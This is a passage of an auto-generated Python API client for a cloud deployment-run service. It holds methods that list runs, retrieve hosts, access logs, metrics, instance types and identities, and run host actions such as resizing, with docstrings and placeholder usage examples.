if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_deployment_runs`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'maxresults' in local_var_params and local_var_params['maxresults'] is not None: # noqa: E501
query_params.append(('maxresults', local_var_params['maxresults'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/deployments/{id}/runs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[MinimalDeploymentRun]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_deployment_runs1(self, search_type, **kwargs): # noqa: E501
"""List Deployment Runs # noqa: E501
Returns a collection of the user's relevant Deployment Runs matching a specified query. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_runs1(search_type, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str search_type: Deployment run status (required)
:param bool in_project: Include project runs
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[MinimalDeploymentRun]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_deployment_runs1_with_http_info(search_type, **kwargs) # noqa: E501
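# Hedged example: search_type filters by run status; the accepted
# values are defined by the service, so 'ACTIVE' here is an assumption.
#
#     runs = api.get_deployment_runs1('ACTIVE', in_project=True)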
def get_deployment_runs1_with_http_info(self, search_type, **kwargs): # noqa: E501
"""List Deployment Runs # noqa: E501
Returns a collection of the user's relevant Deployment Runs matching a specified query. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_runs1_with_http_info(search_type, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str search_type: Deployment run status (required)
:param bool in_project: Include project runs
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[MinimalDeploymentRun], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['search_type', 'in_project', 'maxresults', 'page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_deployment_runs1" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'search_type' is set
if self.api_client.client_side_validation and ('search_type' not in local_var_params or # noqa: E501
local_var_params['search_type'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `search_type` when calling `get_deployment_runs1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'search_type' in local_var_params and local_var_params['search_type'] is not None: # noqa: E501
query_params.append(('search_type', local_var_params['search_type'])) # noqa: E501
if 'in_project' in local_var_params and local_var_params['in_project'] is not None: # noqa: E501
query_params.append(('in_project', local_var_params['in_project'])) # noqa: E501
if 'maxresults' in local_var_params and local_var_params['maxresults'] is not None: # noqa: E501
query_params.append(('maxresults', local_var_params['maxresults'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[MinimalDeploymentRun]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_host(self, id, hostid, **kwargs): # noqa: E501
"""Retrieve Host # noqa: E501
Returns the specified Host in the Deployment Run by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FullDeploymentRunHost
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_host_with_http_info(id, hostid, **kwargs) # noqa: E501
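# Hedged example (placeholder IDs): returns a FullDeploymentRunHost
# model for the requested host.
#
#     host = api.get_host('run-id', 'host-id')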
def get_host_with_http_info(self, id, hostid, **kwargs): # noqa: E501
"""Retrieve Host # noqa: E501
Returns the specified Host in the Deployment Run by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_with_http_info(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FullDeploymentRunHost, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'hostid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_host" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_host`") # noqa: E501
# verify the required parameter 'hostid' is set
if self.api_client.client_side_validation and ('hostid' not in local_var_params or # noqa: E501
local_var_params['hostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `hostid` when calling `get_host`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'hostid' in local_var_params:
path_params['hostid'] = local_var_params['hostid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/host/{hostid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FullDeploymentRunHost', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_host_access(self, id, hostid, **kwargs): # noqa: E501
"""List Host Access Logs # noqa: E501
Returns a collection of the Host Access Logs for a single Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_access(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[RemoteAccessSession]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_host_access_with_http_info(id, hostid, **kwargs) # noqa: E501
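# Hedged example (placeholder IDs and paging values): remote-access
# history for one host, one page at a time.
#
#     sessions = api.get_host_access('run-id', 'host-id', maxresults=25, page=0)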
def get_host_access_with_http_info(self, id, hostid, **kwargs): # noqa: E501
"""List Host Access Logs # noqa: E501
Returns a collection of the Host Access Logs for a single Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_access_with_http_info(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[RemoteAccessSession], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'hostid', 'maxresults', 'page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_host_access" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_host_access`") # noqa: E501
# verify the required parameter 'hostid' is set
if self.api_client.client_side_validation and ('hostid' not in local_var_params or # noqa: E501
local_var_params['hostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `hostid` when calling `get_host_access`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'hostid' in local_var_params:
path_params['hostid'] = local_var_params['hostid'] # noqa: E501
query_params = []
if 'maxresults' in local_var_params and local_var_params['maxresults'] is not None: # noqa: E501
query_params.append(('maxresults', local_var_params['maxresults'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/host/{hostid}/access', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[RemoteAccessSession]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_host_configuration_metrics(self, id, start, end, **kwargs): # noqa: E501
"""Retrieve Metrics # noqa: E501
Returns metric data for Deployment Runs launched by members of the specified Project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_configuration_metrics(id, start, end, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of project (required)
:param int start: Interval start time, specified in seconds since epoch (required)
:param int end: Interval end time, specified in seconds since epoch (required)
:param int interval: Number of intervals
:param str interval_unit: Interval unit
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_host_configuration_metrics_with_http_info(id, start, end, **kwargs) # noqa: E501
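# Hedged example: start/end are epoch seconds, so a trailing 24-hour
# window can be built with time.time(); the interval_unit value is an
# assumption, as the accepted units are service-defined.
#
#     import time
#     end = int(time.time())
#     start = end - 24 * 3600
#     metrics = api.get_host_configuration_metrics(
#         'project-id', start, end, interval=24, interval_unit='HOURS')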
def get_host_configuration_metrics_with_http_info(self, id, start, end, **kwargs): # noqa: E501
"""Retrieve Metrics # noqa: E501
Returns metric data for Deployment Runs launched by members of the specified Project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_configuration_metrics_with_http_info(id, start, end, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of project (required)
:param int start: Interval start time, specified in seconds since epoch (required)
:param int end: Interval end time, specified in seconds since epoch (required)
:param int interval: Number of intervals
:param str interval_unit: Interval unit
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(str, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'start', 'end', 'interval', 'interval_unit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_host_configuration_metrics" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_host_configuration_metrics`") # noqa: E501
# verify the required parameter 'start' is set
if self.api_client.client_side_validation and ('start' not in local_var_params or # noqa: E501
local_var_params['start'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `start` when calling `get_host_configuration_metrics`") # noqa: E501
# verify the required parameter 'end' is set
if self.api_client.client_side_validation and ('end' not in local_var_params or # noqa: E501
local_var_params['end'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `end` when calling `get_host_configuration_metrics`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'start' in local_var_params and local_var_params['start'] is not None: # noqa: E501
query_params.append(('start', local_var_params['start'])) # noqa: E501
if 'end' in local_var_params and local_var_params['end'] is not None: # noqa: E501
query_params.append(('end', local_var_params['end'])) # noqa: E501
if 'interval' in local_var_params and local_var_params['interval'] is not None: # noqa: E501
query_params.append(('interval', local_var_params['interval'])) # noqa: E501
if 'interval_unit' in local_var_params and local_var_params['interval_unit'] is not None: # noqa: E501
query_params.append(('intervalUnit', local_var_params['interval_unit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/projects/{id}/metrics/hostconfiguration', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_host_instance_types(self, id, hostid, **kwargs): # noqa: E501
"""List available instance types for host # noqa: E501
Returns a collection of available instance types for resizing a Deployment Run Host. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_instance_types(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: TargetInstanceTypes
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_host_instance_types_with_http_info(id, hostid, **kwargs) # noqa: E501
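# Hedged example (placeholder IDs): candidate sizes for a host resize
# come back as a TargetInstanceTypes model.
#
#     choices = api.get_host_instance_types('run-id', 'host-id')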
def get_host_instance_types_with_http_info(self, id, hostid, **kwargs): # noqa: E501
"""List available instance types for host # noqa: E501
Returns a collection of available instance types for resizing a Deployment Run Host. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_host_instance_types_with_http_info(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(TargetInstanceTypes, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'hostid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_host_instance_types" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_host_instance_types`") # noqa: E501
# verify the required parameter 'hostid' is set
if self.api_client.client_side_validation and ('hostid' not in local_var_params or # noqa: E501
local_var_params['hostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `hostid` when calling `get_host_instance_types`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'hostid' in local_var_params:
path_params['hostid'] = local_var_params['hostid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/host/{hostid}/resize', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TargetInstanceTypes', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_identities(self, id, hostid, **kwargs): # noqa: E501
"""Get Host Identities # noqa: E501
Returns a collection of identities for the deployment run host. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_identities(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[BaseIdentity]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_identities_with_http_info(id, hostid, **kwargs) # noqa: E501
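# Hedged example (placeholder IDs): all identities on the host, as
# list[BaseIdentity].
#
#     identities = api.get_identities('run-id', 'host-id')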
def get_identities_with_http_info(self, id, hostid, **kwargs): # noqa: E501
"""Get Host Identities # noqa: E501
Returns a collection of identities for the deployment run host. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_identities_with_http_info(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[BaseIdentity], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'hostid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_identities" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_identities`") # noqa: E501
# verify the required parameter 'hostid' is set
if self.api_client.client_side_validation and ('hostid' not in local_var_params or # noqa: E501
local_var_params['hostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `hostid` when calling `get_identities`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'hostid' in local_var_params:
path_params['hostid'] = local_var_params['hostid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/host/{hostid}/identities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[BaseIdentity]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)

    def get_identity(self, id, hostid, **kwargs):  # noqa: E501
        """Get Host Identity For User  # noqa: E501

        Returns the deployment run host identity for the user, if one exists.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_identity(id, hostid, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param str hostid: ID of host (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: list[CloudResourceAccessListing]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.get_identity_with_http_info(id, hostid, **kwargs)  # noqa: E501
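
    # Illustrative sketch of the shared keyword options (values hypothetical):
    # a (connection, read) timeout tuple bounds each phase separately, and
    # _preload_content=False returns the raw urllib3.HTTPResponse unparsed.
    #
    #     listing = api.get_identity('run-123', 'host-456',
    #                                _request_timeout=(3.0, 30.0))
    #     raw = api.get_identity('run-123', 'host-456', _preload_content=False)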

    def get_identity_with_http_info(self, id, hostid, **kwargs):  # noqa: E501
        """Get Host Identity For User  # noqa: E501

        Returns the deployment run host identity for the user, if one exists.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_identity_with_http_info(id, hostid, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param str hostid: ID of host (required)
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(list[CloudResourceAccessListing], status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['id', 'hostid']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_identity" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                       local_var_params['id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `id` when calling `get_identity`")  # noqa: E501
        # verify the required parameter 'hostid' is set
        if self.api_client.client_side_validation and ('hostid' not in local_var_params or  # noqa: E501
                                                       local_var_params['hostid'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `hostid` when calling `get_identity`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in local_var_params:
            path_params['id'] = local_var_params['id']  # noqa: E501
        if 'hostid' in local_var_params:
            path_params['hostid'] = local_var_params['hostid']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

        return self.api_client.call_api(
            '/api/drs/{id}/host/{hostid}/identity', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[CloudResourceAccessListing]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def perform_host_action(self, id, deploymentrunhostid, action, **kwargs):  # noqa: E501
        """Execute Host Action  # noqa: E501

        Executes an action against the specified Host in the Deployment Run for the ID provided.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.perform_host_action(id, deploymentrunhostid, action, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param str deploymentrunhostid: ID of host (required)
        :param str action: Action to perform (required)
        :param int cpu: Desired number of CPUs, if resizing a host in a non-instance-type-based virtualization realm
        :param int ram: Desired amount of RAM in mebibytes, if resizing a host in a non-instance-type-based virtualization realm
        :param str instance_type_name: The instance type name to resize to, if resizing a host in an instance-type-based virtualization realm
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: bool
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.perform_host_action_with_http_info(id, deploymentrunhostid, action, **kwargs)  # noqa: E501
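
    # Illustrative sketch (ids and the action name are hypothetical): in a
    # realm sized by explicit resources, pass cpu/ram; in an instance-type
    # based realm, pass instance_type_name instead.
    #
    #     api.perform_host_action('run-123', 'host-456', 'RESIZE',
    #                             cpu=4, ram=8192)
    #     api.perform_host_action('run-123', 'host-456', 'RESIZE',
    #                             instance_type_name='m5.large')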

    def perform_host_action_with_http_info(self, id, deploymentrunhostid, action, **kwargs):  # noqa: E501
        """Execute Host Action  # noqa: E501

        Executes an action against the specified Host in the Deployment Run for the ID provided.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
